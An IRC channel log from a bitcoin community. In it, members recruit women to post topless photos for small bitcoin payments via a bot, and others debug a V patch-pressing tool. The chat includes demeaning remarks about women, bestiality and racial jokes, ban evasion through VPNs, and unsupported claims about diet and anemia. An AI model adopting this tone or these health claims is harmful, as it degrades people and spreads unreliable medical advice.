1794137;1523214894;spool;;) 1794138;1523215028;mircea_popescu;spool : make a post on /b, detailing your experience, "here's how i made 2 bitcents", link http://trilema.com/2014/ill-pay-for-your-tits/#selection-365.2-365.35 1794139;1523215069;spool;certainly, anything in particular you want me to pay attention to or just from the soul ? 1794140;1523215079;mircea_popescu;soul baby. 1794141;1523215106;spool;;) give me a minute, i love writing 1794142;1523215141;mircea_popescu;there's no rush. 1794143;1523215166;mircea_popescu;but anyone who feels like raiding 4chan this morn... get your keyboards ready lol, she's about to link 1794144;1523215196;spool;i am making a coffee and reflecting, coming back ready to write 1794145;1523215410;deedbot;http://trilema.com/2018/you-know-who-the-best-us-president-was-how-about-andrew-johnson/ << Trilema - You know who the best US president was ? How about Andrew Johnson ? 1794146;1523215431;*;mircea_popescu is idly wondering how long until the veterans realise that the lulz mining potential of teh republic very VERY far outstrips the rigid limitation of the whole "alt right" wank. 1794147;1523215450;douchebag;alt right is just edgy 1794148;1523215464;douchebag;I like lulz that involve being clever and original 1794149;1523215525;mircea_popescu;makes two of us 1794150;1523215565;mircea_popescu;!!rate spool 1 tits 1794151;1523215568;deedbot;Get your OTP: http://p.bvulpes.com/pastes/EysKd/?raw=true 1794152;1523215570;mircea_popescu;!!up spool 1794153;1523215571;deedbot;spool voiced for 30 minutes. 1794154;1523215636;douchebag;spool: So are you happy with your experience? 1794155;1523215738;spool;yea, im almost done writing, i will link it here after 1794156;1523215788;mircea_popescu;spool i rate you, which means you can now voice yourself. say !!up to deedbot in pm, then pass the string you decrypt with !!v 1794157;1523216275;douchebag;!!up spool 1794158;1523216276;deedbot;spool voiced for 30 minutes. 1794159;1523216357;mircea_popescu;spool what's west chester like, btw ? 1794160;1523216411;douchebag;think shes afk atm 1794161;1523216595;lobbes;While imo this is a good general approach to life, in this specific instance you are (presumably) -paying- this external wot in time and money to teach members of that wot how to fish >>  http://btcbase.org/log/2018-04-08#1794094 1794162;1523216595;a111;Logged on 2018-04-08 18:50 douchebag: or pointing them in the direction of good resources 1794163;1523216753;spool;sorry im back, mircea_popescu, i use a random vpn switcher because im banned on 4chan at home 1794164;1523216767;mircea_popescu;:p 1794165;1523216773;spool;its free but not too stable 1794166;1523216783;mircea_popescu;so what do you do ? school ? work ? 1794167;1523216790;spool;school, nursing 1794168;1523216807;spool;don't have the patience for teaching ;P 1794169;1523216809;mircea_popescu;what are you studying ? 1794170;1523216822;mircea_popescu;ah, sorry, nursing school ? 1794171;1523216824;spool;http://boards.4chan.org/b/thread/765301869 1794172;1523216835;spool;yup, my mom and grandmother, both nurses 1794173;1523216861;mircea_popescu;if you know enough of computers to set up a vpn switcher, you might as well join douchebag in his multi-mn security venture to come, neh ? 1794174;1523216947;spool;oh, I am not computer smart, I use http://ipsharkk.com/ though 1794175;1523216973;spool;its pretty easy and free 1794176;1523216988;mircea_popescu;well, a cut above the average girl we've seen to date, anyways. 1794177;1523216996;mircea_popescu;!!pay spool 0.01 1794178;1523217001;deedbot;Get your OTP: http://p.bvulpes.com/pastes/xJJW7/?raw=true 1794179;1523217019;spool;mircea_popescu: I had an issue with posting on 4chan, they are very picky about ISP now ;( 1794180;1523217033;mircea_popescu;lobbes conversely, his inclination to help people made a half dozen girls a pretty penny to date, huh. 1794181;1523217045;spool;they say abuse but, its 4chan... 1794182;1523217136;*;spool anxiously hitting refresh 1794183;1523217172;spool;well, I guess I should have expected that.. 1794184;1523217208;mircea_popescu;hm ? 1794185;1523217250;spool;some rude-ish comments, but it wasnt only body that got thick over these years, my internet skin also did 1794186;1523217274;mircea_popescu;lol 1794187;1523217282;spool;wasn't only my body* 1794188;1523217284;BingoBoingo;4chan's a sewer. Every now and they you might dig up some j00ls that got flushed, but to get that you have to shovel a lot of crap first. 1794189;1523217297;spool;too much coffee ;) brain outruns fingers sometimes 1794190;1523217344;mircea_popescu;BingoBoingo kinda what it always was neh ? 1794191;1523217359;BingoBoingo;I mean that's the internet in general 1794192;1523217386;mircea_popescu;spool what's your new diet ? 1794193;1523217399;spool;mircea_popescu: ive always wanted to try vegan 1794194;1523217405;spool;but cheese... 1794195;1523217409;douchebag;mircea_popescu: Is it cool if I setup an irccloud account for girls to use to make this process a bit easier for them ? 1794196;1523217410;spool;ugh 1794197;1523217462;mircea_popescu;douchebag sure, why not. 1794198;1523217468;douchebag;alright sounds good 1794199;1523217473;spool;I thought about the cheater vegetarian style too, with eggs+fish 1794200;1523217503;mircea_popescu;spool dollars to donuts it's probably chemicals in cheap/processed food that's fucking you over. 1794201;1523217509;spool;I am worried about anemia 1794202;1523217519;spool;my mother has had iron issues in the past 1794203;1523217537;mircea_popescu;toxic anemia hapens lots and lots in overweight us girls once they start losing. 1794204;1523217543;mircea_popescu;50-50 shot. or worse. 1794205;1523217593;spool;yea thats true too, its amazing how died effects how we feel 1794206;1523217604;spool;they dont teach that in the food pyramid though 1794207;1523217649;mircea_popescu;anwyay, switch away from the supermarket, buy from farmers or w/e, the less industrialized crap the better. that's kinda the side benefit of "vegan", such as it is (was, mostly, rapidly going away) : moved people away from the industrial food process, made them feel healthier. 1794208;1523217678;spool;oh i love the farmers market 1794209;1523217679;mircea_popescu;only problem with not eating crap, of course, is that you go from $2 happy meals to $20 meat and produce. 1794210;1523217685;spool;its just sometimes hard hours wise 1794211;1523218357;mircea_popescu;in other lulz, "what's a racist name to call white people ?" "massa". 1794212;1523218502;douchebag;lol 1794213;1523218613;mircea_popescu;http://boards.4chan.org/b/thread/765295887#p765299200 << the gem BingoBoingo was talking about (thread about pregnancy, dood's post is "bump") 1794214;1523218644;mircea_popescu;wd 1794215;1523218650;spool;i got one ;) 1794216;1523218657;spool;how do you circumcise a redneck? 1794217;1523218662;spool;kick his sister in the chin 1794218;1523218677;mircea_popescu;wait, i don't get it. 1794219;1523218688;mircea_popescu;oh, she's sucking him off ? i see i see 1794220;1523218692;spool;;P 1794221;1523218696;spool;gross i know 1794222;1523218725;mircea_popescu;not exactly circum-cision is it. more like straightcision. 1794223;1523218789;BingoBoingo;Yeah what you gotta to is put a pipe threader in his goat's asshole 1794224;1523218809;spool;getting the proper velocity can make the difference between success and a trip to the ER, so ive been told 1794225;1523218833;mircea_popescu;no, the pipe threader's the right move here. 1794226;1523219011;BingoBoingo;Something like https://www.ridgid.com/hn/en/300-compact-threading-machine 1794227;1523219029;BingoBoingo;Actually probably easier to get a goat costume for the threader 1794228;1523219050;mircea_popescu;lol 1794229;1523219064;mircea_popescu;"o wow, new goat! holy moly billy bob, this one's a virgin!" 1794230;1523219147;BingoBoingo;Automating the virgin goat pipe threader would be a good application for that Rockchip board 1794231;1523219160;spool;lol, ive seen signs going up for goat lawncare this year 1794232;1523219181;spool;would like to catch them in action some day 1794233;1523219394;BingoBoingo;There was a Goat bitcoin in-vest thing in 2012, and then there was a Goat litecoin in-vest thing 2013-2015. And kinda just lost track of the lulzmine 1794234;1523219408;mircea_popescu;mgga ? 1794235;1523219518;BingoBoingo;You know that Chaang-Noi thing hanbot kept stomping her heel into the temple of. Kept striking but never found brain 1794236;1523219554;mircea_popescu;was this the "moved to thailand for cheaper whores" dood ? 1794237;1523219559;BingoBoingo;One of them 1794238;1523220034;hanbot;i prefer the goat at the top of the hill here. technically he lives at a bus stop, but it's a few acres of grassy knolls, peppered with impromptu climbing/jumping obstacles set up by someone with a lotta scrap parts and a blowtorch 1794239;1523220047;mircea_popescu;what do you mean, "you prefer" 1794240;1523220080;hanbot;i.e. his company over the annals/memory of that chaang-noi specimen. 1794241;1523220091;mircea_popescu;of the annals, i see i see 1794242;1523220111;mircea_popescu;oh* 1794243;1523220862;mircea_popescu;!!up girlbags 1794244;1523220862;deedbot;girlbags voiced for 30 minutes. 1794245;1523220866;girlbags;hey mircea_popescu this is me douchebag 1794246;1523220875;mircea_popescu;hi girlbags, this is me mircea_popescu 1794247;1523220895;douchebag;what 1794248;1523220899;girlbags;irccloud is actually pretty nice 1794249;1523220952;douchebag;client lag 1794250;1523220963;douchebag;saw a different message lol 1794251;1523221211;girlbags;ok this should be much easier than trying to explain the the normie girls how to connect 1794252;1523221278;douchebag;Also, if the girls want to stay in here they wont miss messages and such 1794253;1523221280;douchebag;ect.. 1794254;1523221293;douchebag;+ it has a mobile app 1794255;1523222788;douchebag;mircea_popescu: I got a girl who wants to show tits 1794256;1523222807;douchebag;Getting her logged in right now 1794257;1523222867;shinohai;Afternoon #trilema 1794258;1523222908;shinohai;mircea_popescu: was wondering if you might link me to that trilema header where you are sitting on a balcony with hanbot standing behind you. 1794259;1523223084;douchebag;!!up xisty 1794260;1523223085;deedbot;xisty voiced for 30 minutes. 1794261;1523223087;xisty;😄 1794262;1523223092;xisty;<3 douchebag 1794263;1523223109;xisty;how are you love? 1794264;1523223127;douchebag;mircea_popescu is the man you'll want to talk to 1794265;1523223162;xisty;oh okay, excellent 1794266;1523223194;xisty;can we send pictures on here? like discord? 1794267;1523223209;douchebag;Upload it to imgur and send the link 1794268;1523223266;douchebag;You're on irccloud on your phone though right? 1794269;1523223280;xisty;if it works with iPhone I can yes 1794270;1523223289;douchebag;you'll be able to upload it directly 1794271;1523223298;xisty;let me install it 1 minute 1794272;1523223372;xisty;Wow this is nice! 1794273;1523223479;douchebag;Mhmm 1794274;1523223527;xisty;It's way different from Discord, much more peaceful no yelling autist 😛 1794275;1523223552;douchebag;No yellin autists in here 1794276;1523223574;mircea_popescu;hola 1794277;1523223604;mircea_popescu;xisty 3b0aece2 1794278;1523223728;xisty;1 second love. 1794279;1523223732;mircea_popescu;shinohai http://trilema.com/wp-content/themes/trilema/images/bg_may2017.jpg ? 1794280;1523223750;shinohai;That's be the one, thanks 1794281;1523223773;shinohai;Though seems I was incorrect in my recollection of a balcony. 1794282;1523223800;mircea_popescu;just a large vaudeville mirror 1794283;1523223881;douchebag;mircea_popescu: just curious, do you have any particularly favorite cars? 1794284;1523223976;mircea_popescu;you mean like http://trilema.com/wp-content/uploads/2018/03/cars.jpg ? 1794285;1523224065;douchebag;ooh those are yours?! 1794286;1523224082;mircea_popescu;no, i just sneak in at night and lean against them. 1794287;1523224092;douchebag;lol 1794288;1523224096;douchebag;What porsche is that? 1794289;1523224102;mircea_popescu;an older one. 1794290;1523224126;douchebag;How do you like it? 1794291;1523224135;mircea_popescu;believe it or not i don't actually drive. 1794292;1523224156;mircea_popescu;but from what i hear it's a great car. 1794293;1523224169;douchebag;I love Porsche's 1794294;1523224179;douchebag;beautiful vehicles they drive great too 1794295;1523224194;douchebag;I've driven a few different ones 1794296;1523224201;douchebag;Not my cars, but I took em for a spin 1794297;1523224250;douchebag;My friend used to drop me off in his dads porsche almost every day in junior-senior year of highschool 1794298;1523224375;xisty;https://usercontent.irccloud-cdn.com/file/5VxUjW3y/image.png 1794299;1523224386;xisty;Sorry I wanted to do something a little extra 1794300;1523224397;xisty;😋 1794301;1523224433;douchebag;nice 1794302;1523224451;xisty;❤️ douchebag 1794303;1523224488;douchebag;I'm not the one paying you sweetheart 1794304;1523224492;douchebag;that would be mircea_popescu 1794305;1523224512;xisty;I know, frand ;) 1794306;1523224602;xisty;https://usercontent.irccloud-cdn.com/file/isPtHzIJ/image.png 1794307;1523224615;xisty;I was pretty low energy at first 1794308;1523224633;xisty;But bonus for fun 1794309;1523224831;xisty;mircea_popescu: Not okay? 1794310;1523224913;douchebag;!!up xisty 1794311;1523224913;deedbot;xisty voiced for 30 minutes. 1794312;1523225253;douchebag;mircea_popescu: you around friend? 1794313;1523225254;xisty;What's for dinner douchebag ? You making me any too? :) 1794314;1523225272;douchebag;Steak and beer 1794315;1523225286;xisty;👍 1794316;1523225289;douchebag;hbu? 1794317;1523225307;xisty;That sounds excellent at the moment 1794318;1523225345;mircea_popescu;yeah. o look, irccloud has image hosting too ? 1794319;1523225347;douchebag;Oh yeah this is delicious 1794320;1523225355;douchebag;mircea_popescu: Mhmm, they also have a paste service 1794321;1523225362;mircea_popescu;nice. 1794322;1523225366;xisty;Yeah mircea_popescu, I uploaded from phone. It was quite easy. 1794323;1523225374;mircea_popescu;hey there titsty! 1794324;1523225378;mircea_popescu;!!pay xisty 0.02 1794325;1523225382;xisty;:o 1794326;1523225386;deedbot;Get your OTP: http://p.bvulpes.com/pastes/uzvK5/?raw=true 1794327;1523225393;xisty;Im glad you enjoyed 1794328;1523225394;mircea_popescu;what do you do, other than uploading from phone ? 1794329;1523225412;xisty;I like to play Fortnite 1794330;1523225428;xisty;And watch others play on Twitch 1794331;1523225442;xisty;Boring girl, I know :( 1794332;1523225464;xisty;What do you like to do? 1794333;1523225472;mircea_popescu;i don't think i ever played fortnite. what is it ? 1794334;1523225489;mircea_popescu;xisty these days, i mostly talk to girls. 1794335;1523225512;xisty;Its a new game, FPS but very big areas. Very fun and free to play. 1794336;1523225524;mircea_popescu;ah. i'm more of a tbs sorta guy. 1794337;1523225535;xisty;Tbs? 1794338;1523225548;mircea_popescu;turn based strategy 1794339;1523225576;xisty;Ohhh, I tried League of Legends, too much clicking I broke my trackpad lol 1794340;1523225602;mircea_popescu;i think that's more of a ... hmm. not even sure. azn mmorpg ? 1794341;1523225633;xisty;Its definitely not turned based! You cant relax your mind for a second even. 1794342;1523225658;mircea_popescu;yeah, a sort of a warcraft/starcraft with moba instead of management. 1794343;1523225660;xisty;And people get very upset when you mess up, too serious. I had to stop playing from stress. 1794344;1523225722;mircea_popescu;anyway, no, the golden standard are the heroes series, heroes2/3. fallout maybe a little also, stuff like that. the old infinity engine stuff too, i guess, baldur's gate and so on 1794345;1523226331;xisty;Time to take the doge for a walk, Thanks again mircea_popescu, I will tell some of my galpals also if thats okay? :) 1794346;1523226387;mircea_popescu;by all means. 1794347;1523226480;xisty;Any preferences? nerdy, punk, etc? 1794348;1523226741;douchebag;!!up xisty 1794349;1523226741;deedbot;xisty voiced for 30 minutes. 1794350;1523226775;mircea_popescu;not really. 1794351;1523226798;mircea_popescu;course nerdy girls possibly have a better chance of making a future for themselves in the republic, but it's not that cut and dried. 1794352;1523226898;xisty;Cool, got a few friends in textile engineering who would probably be interested, I will let them know next time we speak! Bye loves 1794353;1523228200;mircea_popescu;textile engineering !? 1794354;1523232583;douchebag;mircea_popescu: 1794355;1523232585;douchebag;You still around? 1794356;1523232594;douchebag;I got a girl looking to show her taters 1794357;1523232864;douchebag;!!up zezizezi 1794358;1523232865;deedbot;zezizezi voiced for 30 minutes. 1794359;1523232871;douchebag;She's looking to show tits 1794360;1523233022;zezizezi;!!register http://p.bvulpes.com/pastes/UjkdZ/?raw=true 1794361;1523233025;deedbot;66EFFB6EED397AAB924B2EADF43B0CBEF8B6FFD3 registered as zezizezi. 1794362;1523233194;zezizezi;im here to show my tits ? 1794363;1523233357;zezizezi;hello? 1794364;1523233362;zezizezi;anyone there? 1794365;1523233404;douchebag;give him a minute 1794366;1523234054;douchebag;mircea_popescu: are you around man? 1794367;1523234720;douchebag;!!up zezizezi 1794368;1523234720;deedbot;zezizezi voiced for 30 minutes. 1794369;1523235011;douchebag;asciilifeform: 1794370;1523235013;douchebag;ben_vulpes: 1794371;1523235101;douchebag;would one of you guys be able to provide a code instead of mp while he's away 1794372;1523235109;douchebag;incase she needs to leave ? 1794373;1523235131;danielpbarron;the code is usually the random string the webchat assigns 1794374;1523235214;douchebag;danielpbarron: would you be able to pull that string of chars for me? 1794375;1523235241;danielpbarron;in zezizezi's case, i see something like sid262319 but that doesn't look like the others so idk 1794376;1523235241;douchebag;because she wants to go to bed soon 1794377;1523235302;douchebag;danielpbarron: if you're able to give the go ahead and provide a code, let her know 1794378;1523235319;danielpbarron;i'm not, but it's worth a shot no? 1794379;1523235413;zezizezi;i just wanna get this done :X 1794380;1523235583;ben_vulpes;patience is a virtue 1794381;1523235589;ben_vulpes;persistence idem 1794382;1523235631;zezizezi;your right i will just keep waiting hehe 1794383;1523236528;douchebag;!!up zezizezi 1794384;1523236528;deedbot;zezizezi voiced for 30 minutes. 1794385;1523236812;douchebag;danielpbarron: do you think mircea_popescu will be back tonight? 1794386;1523236845;danielpbarron;what am I my lord's keeper? 1794387;1523236870;douchebag;I just figure you might know the times he's on better than me 1794388;1523236900;danielpbarron;he's on a lot, but no specific schedule 1794389;1523243474;mircea_popescu;douchebag yeah. 1794390;1523243507;mircea_popescu;danielpbarron that was pretty good lol. 1794391;1523243669;douchebag;Alright i'll hit her up 1794392;1523243752;douchebag;mircea_popescu: You doing anything interesting tonight? 1794393;1523243969;mircea_popescu;fancy this : i was walking through the park and i ran into these coupla carny chicks working out their juggling skills. so i asked them if they wanna have desert ; they did so i took them to the local whorehouse restaurant for cheesecake. 1794394;1523244013;douchebag;Cheesecake is pretty good, were they attractive? 1794395;1523244014;mircea_popescu;the bulls were most wtf. the waiters were most wtf. this other black dude sitting there with a horse of a whore was BEYOND WTF. but my chicks dumped their unicycle, circles, pins and whatnot on the floor and had their coffee. 1794396;1523244024;mircea_popescu;cute girlies, sure. 1794397;1523244045;douchebag;hell yeah 1794398;1523244093;mircea_popescu;pretty good with the malaversas, too. turns out that's how you call juggling in spanish. MALVERSATIONS 1794399;1523244256;douchebag;interesting 1794400;1523244922;douchebag;Apparently they are now blasting mens penises with a bunch of sound waves now to fight erectile dysfunction 1794401;1523245386;mircea_popescu;i think it's called a hummer. 1794402;1523245419;danielpbarron;not quite ready yet due to trilema-style urls not working yet, will switch it over to danielpbarron.com when ready, but here is my new blog hosted on pizarro: http://pizarro.danielpbarron.com/ 1794403;1523245452;mircea_popescu;o hey. 1794404;1523245876;mircea_popescu;!!up zezizezi 1794405;1523245876;deedbot;zezizezi voiced for 30 minutes. 1794406;1523245895;mircea_popescu;hi there zezizezi 1794407;1523245921;douchebag;ive been trying to get ahold of her 1794408;1523245925;douchebag;doesn't seem to be online atm 1794409;1523245932;mircea_popescu;no big rush. 1794410;1523245944;douchebag;Yeah I know, she def was interested in the offer 1794411;1523245950;douchebag;so we'll see tomorrow 1794412;1523245956;douchebag;or whenever she gets on 1794413;1523247347;douchebag;mircea_popescu: I'm talking to a girl right now 1794414;1523247354;douchebag;She might be interested 1794415;1523247455;mircea_popescu;aite. 1794416;1523247479;douchebag;tryna sweet talk her right now 1794417;1523247939;hanbot;phf et al: attempted to press latest vtools to the keccak head. v (mod6's) reports vtools_vpatch_newline not in flow, neither its antecedent vtools_fixes_static_tohex, despite both patches and (verified good) sigs present (they neither show up via flow command). v will press to vtools_vpatch.vpatch, but no further. see http://p.bvulpes.com/pastes/oNRhE/?raw=true . 1794418;1523247964;hanbot;not sure if this has something to do with the note in phf's accompanying release post re btcbase presser not working quite right.... 1794419;1523248032;mod6;ugh 1794420;1523248050;mod6;i'll take a look 1794421;1523248131;mircea_popescu;hanbot manifest is broken 1794422;1523248165;mircea_popescu;o no nm, i had them in reverse order. 1794423;1523248192;mircea_popescu;it's actually 6144 -> 7ebf ; 7ebf -> 154d 1794424;1523248400;mircea_popescu;hanbot that is so fucking weird ; v.pl literally greps for the name in order to spit out that error, and the name's right there. 1794425;1523248955;mod6;well, 'vtools_fixes_static_tohex.vpatch' is not found in her flow. 1794426;1523248975;mod6;which is where the error comes from. im getting all of his patches & sigs and will see wtf 1794427;1523248994;mircea_popescu;but it's in the ls. 1794428;1523249091;mod6;yeah, but v.pl isn't picking it up, for some reason; i'll get to the bottom of why. 1794429;1523249101;mod6;hanbot: can you tell us what version of v.pl you are using? 1794430;1523249275;hanbot;99994 K 1794431;1523249476;mod6;ok, update to 99993 K plz. not sure it'll solve ~this~ problem yet. 1794432;1523249495;*;mod6 is just digging in 1794433;1523250055;hanbot;mod6 same results with 99993 1794434;1523250116;mod6;yup, i see the same. 1794435;1523250120;mod6;and i've found the issue. 1794436;1523250122;mod6;stand by 1794437;1523250224;mod6;Before I paste this, lemme describe what I'm doing here: 1) I'm starting fresh, grabbing all the vpatches and sigs referenced in the most recent blog post by phf at http://barksinthewind.com/2018/vtools-keccak-regrind/ 1794438;1523250251;mod6;2) Once I have all the files, I put them in the proper place. Then grab the latest V (99993) and verify that it's correct. 1794439;1523250293;mod6;3) Check the flow, see that vtools_fixes_static_tohex.vpatch is not in the flow, and check to ensure that the seal verifies, and it dows 1794440;1523250296;mod6;*does 1794441;1523250342;mod6;4) Check the press paths -- there are ~two~ (phf said this was experimental previously) 1794442;1523250368;mod6;5) Check the origins of the antecedent hashes in 'vtools_fixes_static_tohex.vpatch' to see if we're missing one. 1794443;1523250450;mod6;6) We're not missing an antecedent vpatch; however, '98ba7212fafa4a61f6d6096f1a2953a67a70fcf185965ed7199a223f6897c9b9f2996d391a3f363282236889413973d0beada0e36d57068549bea672fd110d8d' matches two antecedents 1794444;1523250459;mod6;http://p.bvulpes.com/pastes/tD3fl/?raw=true 1794445;1523250464;mod6;^ my testing 1794446;1523250581;mod6;one will notice that these antecedent origins are from two separate press-paths. 1794447;1523250705;mod6;I'm not sure how to reconsile this. If you have a different v tool that will help you work around this, by all means. 1794448;1523250821;mircea_popescu;mod6 how the heck can both sha fixes and fixes newline have the same hash 1794449;1523250858;mircea_popescu;oh, they don't, they just have the same antecedent. why is this a problem ? 1794450;1523250898;mircea_popescu;99994 and 99993 correctly press past this split, you're aware. 1794451;1523250973;mod6;'vdiff_sha_fixes_newline_gcc.vpatch' and 'vdiff_fixes_newline_gcc.vpatch' indeed have the same output hash. 1794452;1523251063;mod6;<+mircea_popescu> oh, they don't, they just have the same antecedent. why is this a problem ? << im not sure at this point. could be an edge case im not catching, or could be buried in old rules built into my v. 1794453;1523251082;mircea_popescu;hang on wtf. 1794454;1523251082;mod6;and a good question, is this a problem for 'theory of v' ? 1794455;1523251116;mod6;i'd have to fully debug the problem here, im only showing the symptoms here. 1794456;1523251213;mircea_popescu;omf they do : http://p.bvulpes.com/pastes/MOixj/?raw=true 1794457;1523251224;mircea_popescu;phf dude you did the conflict wth is this! 1794458;1523251303;mircea_popescu;mod6 well i dun see how we can have collisions and live. i can't even understand how the fuck this was possible, two patches with DIFFERENT antecedents hash-colliding ?! 1794459;1523251328;mircea_popescu;i mean, vdiff_sha_fixes_newline_gcc.vpatch sorts off vtools_vdiff_sha, whereas vdiff_fixes_newline_gcc.vpatch sorts right off genesis. 1794460;1523251347;mod6;<+mircea_popescu> omf they do : http://p.bvulpes.com/pastes/MOixj/?raw=true << here I think you inadvertantly curled & diffed the same files. 1794461;1523251386;mod6;this is different than what i'm saying. the two distinct vpatches, 'vdiff_sha_fixes_newline_gcc.vpatch' and 'vdiff_fixes_newline_gcc.vpatch', contain the same output, '98ba7212fafa4a61f6d6096f1a2953a67a70fcf185965ed7199a223f6897c9b9f2996d391a3f363282236889413973d0beada0e36d57068549bea672fd110d8d' 1794462;1523252011;mod6;oh wait. 1794463;1523252014;mod6;there is more going on here. 1794464;1523252083;mod6;'vtools_fixes_static_tohex.vpatch' is not the only one to be dropped out, so is 'vdiff_sha_static.vpatch'; i didn't notice on the first pass. 1794465;1523252171;mircea_popescu;oh damn i did do the same file. buffer failure. 1794466;1523252176;phf;http://btcbase.org/log/2018-04-09#1794461 << that was already the case in the previous patchset 1794467;1523252176;a111;Logged on 2018-04-09 05:23 mod6: this is different than what i'm saying. the two distinct vpatches, 'vdiff_sha_fixes_newline_gcc.vpatch' and 'vdiff_fixes_newline_gcc.vpatch', contain the same output, '98ba7212fafa4a61f6d6096f1a2953a67a70fcf185965ed7199a223f6897c9b9f2996d391a3f363282236889413973d0beada0e36d57068549bea672fd110d8d' 1794468;1523252215;*;mircea_popescu is thoroughly confused through the working of his own ineptitude, will need a moment to extract self. 1794469;1523252225;mod6;phf: i thought last time we encountered a problem like this we dropped out a vpatch, then it was fine. 1794470;1523252238;mod6;but this time, i dunno wtf is going on here. it's a mess. 1794471;1523252245;mod6;http://p.bvulpes.com/pastes/GKHPS/?raw=true 1794472;1523252289;mod6;here's where two vpatches have the same outputs for 'xalloc.h' 1794473;1523252293;mod6;^ 1794474;1523252321;douchebag;Hey is it cool if I invite a friend in here, he's a pretty good chatter and he's a technical dude 1794475;1523252332;mod6;then both vdiff_sha_static.vpatch and vtools_fixes_static_tohex.vpatch try to use the same input. 1794476;1523252334;phf;mod6: this might've been encountered before, but i'm talking about the vtools patchset that was there before regrind 1794477;1523252355;douchebag;He'll join in a moment 1794478;1523252393;mircea_popescu;mod6 no, listen, i don't see what the problem you see is. so a number of different patches, which are themselves distinct, nevertheless depend on the same version of a file (here, xaloc). this isn't, nor can be a problem ; and was not a prtoblem before, either. 1794479;1523252400;mod6;oh, im specifically talking about the patch set from your latest post. 1794480;1523252426;mod6;umm. well... 1794481;1523252431;mircea_popescu;as long as the patches don't collide, ie, have the same hash ; and as long as they're properly chained and signed they should press. 1794482;1523252446;mod6;this violates rules that we've previously put in place then. 1794483;1523252449;mircea_popescu;i still don't know why they don't ; but as far as i can see there isn't an actual problem with his patches or seals. 1794484;1523252457;mircea_popescu;mod6 which rules ? 1794485;1523252460;mod6;or it's a side effect of some coding 1794486;1523252466;mod6;i dunno. ugh. 1794487;1523252479;mod6;this is why i don't want to write this thing any more. 1794488;1523252485;mod6;so tired of fucking with v. 1794489;1523252503;mod6;can't even get anything else done, all i do is V. audit peoples shit. 1794490;1523252506;mircea_popescu;mod6 but specifically as to the point, can you see why v.pl spits out that error message there ? am i right in reading the script as "if the file is not found by name" ? 1794491;1523252506;mod6;etc etc etc. 1794492;1523252510;mod6;this is getting SUPER old. 1794493;1523252527;mircea_popescu;well the hope is that eventually we iron out all the edges... 1794494;1523252537;mod6;i don't think im the right person for this. 1794495;1523252545;mod6;someone else now needs to step up and write a V. 1794496;1523252551;mod6;im done with this thing. 1794497;1523252603;mircea_popescu;death("HEAD: $press[1] not found in flow\n") if !grep /^$press[1]$/, @flow << this specifically. how can it fail if it lists the item in flow ? 1794498;1523252628;mod6;it isn't in the flow. that's the problem. 1794499;1523252647;mod6;these vpatches are thrown out as they fail a previous check. 1794500;1523252666;mircea_popescu;oh oh i see! 1794501;1523252705;mod6;I added a debugging line: 1794502;1523252706;mod6;http://p.bvulpes.com/pastes/R65oM/?raw=true 1794503;1523252710;mod6;see, "removed" 1794504;1523252721;mod6;this was removed in the "ante_check" 1794505;1523252737;mod6;*these were removed in the "ante_check" subroutine 1794506;1523252822;mircea_popescu;mod6 ok here's what i don't understand : for some reason the "flow" goes from vtools_vpatch, which is in the keccak line, to vdiff_sha_fixes, which is in the other line (sha line). 1794507;1523252871;mircea_popescu;this makes no sense. basically it goes 5 steps down the keccak tree and then jumps to step 1 and 2 on the sha tree. 1794508;1523252912;mod6;well, i dunno. 1794509;1523252920;mod6;i need to call it a night. 1794510;1523252932;mircea_popescu;sleep tight. best case, we figure it out by morn. 1794511;1523253085;phf;i can only say that i think that btcbase presser is doing the same thing, with the "5 steps down keccak and 2 steps down sha", but the grapher doesn't. i think grapher uses more Graph Theory, but i neither remember what the difference is, nor can i debug it now (was about to go to sleep myself) 1794512;1523253116;mircea_popescu;phf it's incomprehensible to me as the manifest.txt varies wildly. 1794513;1523253155;mircea_popescu;anyway, it's not an emergency, sleep tight also we see tomorro 1794514;1523253498;mircea_popescu;douchebag sure. 1794515;1523253634;douchebag;.Alright 1794516;1523253922;phf;here's a potentially useful picture for those who want to meditate on the antecedent graph, http://btcbase.org/data/vtools/graph-with-hunks.svg it shows individual hunk linkages though unlabeled 1794517;1523254511;douchebag;!!up ckang 1794518;1523254512;deedbot;ckang voiced for 30 minutes. 1794519;1523254515;douchebag;This is my friend here 1794520;1523254523;douchebag;ckang: introduce yourself 1794521;1523254542;ckang;h douchebag 1794522;1523254547;ckang;h mircea_popescu 1794523;1523254610;douchebag;I've known this guy for awhile now, mainly discuss technical topics and such with him 1794524;1523254636;douchebag;He seemed curious to see what this place is about after discussing this 1794525;1523254655;ckang;ive heard stories about this place and decided i needed to see it for myself 1794526;1523254687;ckang;to an outsider it is a pretty extreme idea, but i dig it 1794527;1523255415;mircea_popescu;hello 1794528;1523255487;mircea_popescu;phf oh! it tries to press vdiff_sha / etc because they're actually a dependency for tohex ?! why did you write it this way ? 1794529;1523255519;mircea_popescu;vtools_fixes_static_tohex shouldn't depend on anything from vdiff_sha_fixes_newline_gcc. 1794530;1523255689;mircea_popescu;that's the fucking problem! the vtools_fixes_static_tohex uses xalloc.h 98BA when it should instead use its own line (earlier) version of C89B. 1794531;1523255732;mircea_popescu;ckang are you the guy with the gopher stuff / suckless morphing ? 1794532;1523255767;ckang;oh, no :) 1794533;1523255777;mircea_popescu;so what do you do ? 1794534;1523255778;ckang;I have used the suckless irc bot though 1794535;1523255837;ckang;i do security research 1794536;1523255853;mircea_popescu;ah, liek webstuff and so forth ? 1794537;1523255854;ckang;i guess that is a big vague though, i poke things until they break 1794538;1523255856;ckang;yup 1794539;1523255861;mircea_popescu;aha. 1794540;1523255861;ckang;bit* 1794541;1523255869;douchebag;he's a bit more into lower level stuff than me 1794542;1523255876;mircea_popescu;!!key ckang 1794543;1523255876;douchebag;i'm more experienced with web stuff than him 1794544;1523255877;deedbot;http://wot.deedbot.org/AA17B457498B6702A2CF9B36CEBF835883B21291.asc 1794545;1523255901;mircea_popescu;!!rate ckang moar websecs 1794546;1523255901;douchebag;he also is more into stuff at the network level 1794547;1523255913;mircea_popescu;!!rate ckang 1 moar websecs 1794548;1523255915;deedbot;Get your OTP: http://p.bvulpes.com/pastes/7I1Ac/?raw=true 1794549;1523255916;ckang;yea, I like services over webapps 1794550;1523255922;ckang;I guess would explain it 1794551;1523255931;douchebag;ckang: you can now up yourself 1794552;1523255935;douchebag;using !!up in deedbot pm 1794553;1523255935;ckang;same media different vectors 1794554;1523255968;ckang;oh, I think I need to be unvoiced, says I cant myself yet 1794555;1523255993;mircea_popescu;takes a minute. 1794556;1523256016;ckang;douchebag mentioned some hosting you all where setting up 1794557;1523256031;ckang;I was wondering if there was any details about that available yet? 